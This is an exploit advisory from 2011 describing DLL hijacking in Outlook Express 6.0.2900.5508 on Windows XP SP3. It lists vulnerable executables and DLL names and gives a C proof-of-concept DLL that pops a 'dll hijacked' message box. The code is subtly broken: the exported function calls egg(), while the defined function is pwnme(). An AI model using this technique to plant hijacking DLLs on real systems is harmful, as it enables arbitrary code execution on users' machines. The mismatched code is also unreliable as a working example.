#############################################
outlook 6.0.2900.5508 dll hijacking vulnerability
software : outlook - http://www.microsoft.com
version : 6.0.2900.5508
author : d3c0der - d3c0der@hotmail.com
website : www.attackerz.ir
Operating System : Windows XP (Version 5.1 Service Pack 3)
date : 2\1\2011
############################################
in Application Path: C:\Program Files\Outlook Express :
file : msimn.exe
Vulnerable dll : pgpoe.dll
file : Wabmig.exe
Vulnerable dll : wab32res.dll
file : Wab.exe
Vulnerable dll : wab32res.dll
#############################################
#include <windows.h>
#define DllExport __declspec (dllexport)
DllExport void DwmSetWindowAttribute() { egg(); }
int pwnme()
{
MessageBox(0, "dll hijacked !! ", "Dll Message", MB_OK);
exit(0);
return 0;
}
##############################################